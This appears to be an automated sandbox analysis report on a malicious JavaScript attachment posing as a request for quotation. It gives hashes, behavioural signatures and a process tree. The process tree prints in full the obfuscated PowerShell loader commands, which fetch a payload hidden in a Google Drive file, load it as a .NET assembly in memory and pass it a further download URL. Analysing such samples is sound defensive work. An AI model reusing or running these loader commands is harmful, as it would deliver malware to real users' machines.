Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-10-2024 05:17
Static task
static1
Behavioral task
behavioral1
Sample
RFQ-CanparFFTradingCo..js
Resource
win7-20240903-en
General
-
Target
RFQ-CanparFFTradingCo..js
-
Size
180KB
-
MD5
0d3505de58b29682da0f4799e7812306
-
SHA1
9a411ead4bdbed963fdbaafd5729a77a35e63e66
-
SHA256
11d08c101934f51cee60658bbeb71a5988873bfacba3c00f25cea0bd67442926
-
SHA512
c037fef1c0ccb0fff448d0d2344c3edfc2613529ee04133a44b29ed111df9ded4b79f57057edc02c230c68827a0d2b3b1ea3f32f6ce583dd80c61a81b064ef90
-
SSDEEP
3072:94SWDYRx3twtUMy2xtn4BRGLGqlT6HYlxKm3+FmEM5SGDZx392xtn4BRGLGqlhG:xWAx3R4t4BRgjR64lIm3a1ZGdx394t4V
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 2 2108 wscript.exe 4 2108 wscript.exe 8 2876 powershell.exe 10 2876 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1948 powershell.exe 2876 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 drive.google.com 7 drive.google.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1948 powershell.exe 2876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1948 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2108 wrote to memory of 1948 2108 wscript.exe 30 PID 2108 wrote to memory of 1948 2108 wscript.exe 30 PID 2108 wrote to memory of 1948 2108 wscript.exe 30 PID 1948 wrote to memory of 2876 1948 powershell.exe 32 PID 1948 wrote to memory of 2876 1948 powershell.exe 32 PID 1948 wrote to memory of 2876 1948 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\RFQ-CanparFFTradingCo..js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAEUATgB2ADoAQwBPAE0AcwBwAGUAYwBbADQALAAyADYALAAyADUAXQAtAEoAbwBpAE4AJwAnACkAKAAgACgAKAAnAE8AMgB2AGkAbQBhAGcAZQBVAHIAJwArACcAbAAgAD0AIABaAHoANQBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQAnACsAJwBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAaABCAFkAdwB1AHIAWgB6ADUAOwBPADIAdgB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsATwAyAHYAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABPADIAdgB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwAnACsAJwB3AG4AbABvAGEAZABEAGEAdABhACgATwAyAHYAaQBtAGEAZwBlAFUAcgBsACkAOwBPADIAdgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAJwArACcAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABPADIAdgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBPADIAdgBzAHQAYQByAHQARgBsAGEAJwArACcAZwAgACcAKwAnAD0AIABaAHoANQA8ADwAQgBBAFMARQA2ADQAXwAnACsAJwBTAFQAQQBSAFQAPgA+AFoAegA1ADsATwAyAHYAZQBuAGQARgBsAGEAZwAgAD0AIABaAHoANQA8ADwAQgBBAFMARQA2ADQAJwArACcAXwBFAE4ARAA+AD4AWgB6ADUAOwBPADIAdgBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAE8AMgB2AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQB4AE8AZgAoAE8AMgB2AHMAdABhAHIAdABGAGwAYQBnACkAOwBPADIAdgBlAG4AZABJAG4AZABlAHgAIAA9ACAAJwArACcATwAyAHYAaQBtAGEAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgATwAyAHYAZQBuAGQARgBsAGEAZwApADsATwAyAHYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABPADIAdgBlAG4AZABJAG4AZABlACcAKwAnAHgAIAAtAGcAdAAgAE8AMgB2AHMAdABhAHIAdABJAG4AZABlAHgAOwBPADIAdgBzACcAKwAnAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAATwAyAHYAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AE8AMgB2AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAE8AMgB2AGUAbgBkAEkAbgBkAGUAeAAgAC0AIABPADIAdgBzAHQAYQByAHQASQBuAGQAZQB4ADsATwAyAHYAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABPADIAdgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgATwAyAHYAcwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAsACAATwAyAHYAYgBhACcAKwAnAHMAZQA2ADQATABlAG4AZwB0ACcAKwAnAGgAKQA7AE8AMgB2AGIAYQBzAGUANgA0AFIAZQAnACsAJwB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAE8AMgB2AGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBUAG8AQwBoAGEAcgAnACsAJwBBAHIAcgBhAHkAKAApACAAMQBYAG0AIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAATwAyAHYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAE8AMgB2AGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApAF0AOwBPADIAdgBjAG8AJwArACcAbQBtAGEAbgBkAEIAeQB0AGUAJwArACcAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGACcAKwAnAHIAbwBtAEIAYQBzACcAKwAnAGUANgA0AFMAdAByAGkAbgBnACgATwAyACcAKwAnAHYAYgBhAHMAZQA2ADQAJwArACcAUgBlAHYAZQByAHMAZQBkACkAOwBPADIAdgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQAnACsAJwBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAE8AMgB2AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBPADIAdgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkAJwArACcATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAWgB6ACcAKwAnADUAVgBBAEkAWgB6ADUAKQA7AE8AMgB2AHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABPADIAdgBuACcAKwAnAHUAbABsACwAIABAACgAWgB6ADUAdAB4AHQALgBuAGkAZwBpAHIAbwAvAHYAdwBlAG4ALwByAGIALgBtAG8AYwAuADUAMAAxAHIAZQAuAG8AbQBsAC8ALwA6AHMAcAB0AHQAaABaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwBaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwBaAHoANQAsACAAWgB6ADUAQwBhAHMAUABvAGwAWgB6ADUALAAgAFoAegA1AGQAZQBzAGEAdABpAHYAYQBkAG8AWgB6ADUALABaAHoANQBkAGUAcwBhAHQAaQB2AGEAZABvACcAKwAnAFoAegA1ACwAWgB6ACcAKwAnADUAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBaAHoANQAsAFoAegA1AFUAUgBMAFoAegA1ACwAIABaAHoANQBDADoAJwArACcAOABhAEQAUAByAG8AZwByAGEAbQBEAGEAdABhADgAYQBEAFoAegA1ACwAWgB6ADUAcABhAHQAaABvACcAKwAnAHAAJwArACcAaABvAGIAaQBhAFoAegA1ACwAWgB6ADUAagBzAFoAegA1ACwAWgB6ADUAMQBaACcAKwAnAHoANQAsAFoAegAnACsAJwA1ADEAWgB6ADUAKQApADsAJwApAC0AYwByAGUAcABMAEEAYwBFACAAJwBPADIAdgAnACwAWwBjAEgAYQByAF0AMwA2AC0AUgBFAHAATABhAGMARQAgACcAOABhAEQAJwAsAFsAYwBIAGEAcgBdADkAMgAgACAALQBSAEUAcABMAGEAYwBFACAAJwAxAFgAbQAnACwAWwBjAEgAYQByAF0AMQAyADQAIAAtAGMAcgBlAHAATABBAGMARQAnAFoAegA1ACcALABbAGMASABhAHIAXQAzADkAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $ENv:COMspec[4,26,25]-JoiN'')( (('O2vimageUr'+'l = Zz5https://drive.google.com/uc?export=download&id=1'+'AIVgJJJv1F6vS4sUOybnH-sDvUhBYwurZz5;O2vwebClient = New-Object System.Net.WebClient;O2vimageBytes = O2vwebClient.Do'+'wnloadData(O2vimageUrl);O2vimageText = [System.Tex'+'t.Encoding]::UTF8.GetString(O2vimageBytes);O2vstartFla'+'g '+'= Zz5<<BASE64_'+'START>>Zz5;O2vendFlag = Zz5<<BASE64'+'_END>>Zz5;O2vstartIndex = O2vimageTex'+'t.IndexOf(O2vstartFlag);O2vendIndex = '+'O2vimageTex'+'t.IndexOf(O2vendFlag);O2vstartIndex -ge 0 -and O2vendInde'+'x -gt O2vstartIndex;O2vs'+'tartIndex += O2vstartFlag.Length;O2vbase64Length = O2vendIndex - O2vstartIndex;O2vbase64Command = O2vimageText.Substring(O2vstartIn'+'dex, O2vba'+'se64Lengt'+'h);O2vbase64Re'+'versed = -join (O2vbase64Command.ToChar'+'Array() 1Xm ForEach-Object { O2v_ })[-1..-(O2vbase64Command.Length)];O2vco'+'mmandByte'+'s = [System.Convert]::F'+'romBas'+'e64String(O2'+'vbase64'+'Reversed);O2vloadedAssembly = [System.Re'+'flection.Assembly]::Load(O2vcommandBytes);O2vvaiMethod = [dnlib.I'+'O.Home].GetMethod(Zz'+'5VAIZz5);O2vvaiMethod.Invoke(O2vn'+'ull, @(Zz5txt.nigiro/vwen/rb.moc.501re.oml//:sptthZz5, Zz5desativado'+'Zz5, Zz5desativadoZz5, Zz5desativadoZz5, Zz5CasPolZz5, Zz5desativadoZz5,Zz5desativado'+'Zz5,Zz'+'5d'+'esativado'+'Zz5,Zz5URLZz5, Zz5C:'+'8aDProgramData8aDZz5,Zz5patho'+'p'+'hobiaZz5,Zz5jsZz5,Zz51Z'+'z5,Zz'+'51Zz5));')-crepLAcE 'O2v',[cHar]36-REpLacE '8aD',[cHar]92 -REpLacE '1Xm',[cHar]124 -crepLAcE'Zz5',[cHar]39))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TBJSDQL1PU13BD2IV4TS.temp
Filesize7KB
MD5c2693222a71b70dbe3cec053eb78cdaf
SHA13f6aef766d97e844beba8e4e3ca034ff21efd6b6
SHA25684cdcc62afdf7052958d0dca20e4bd788c919998ddd319ec343beb0a05159e3f
SHA512174505e12b52cd64aa9148a2c8748b3057d6970cd5e60a3b13c790351e27997b34d0f166a9b9c04d04d9c129bd1c20481248f026761e4d710845c384b6a49ab8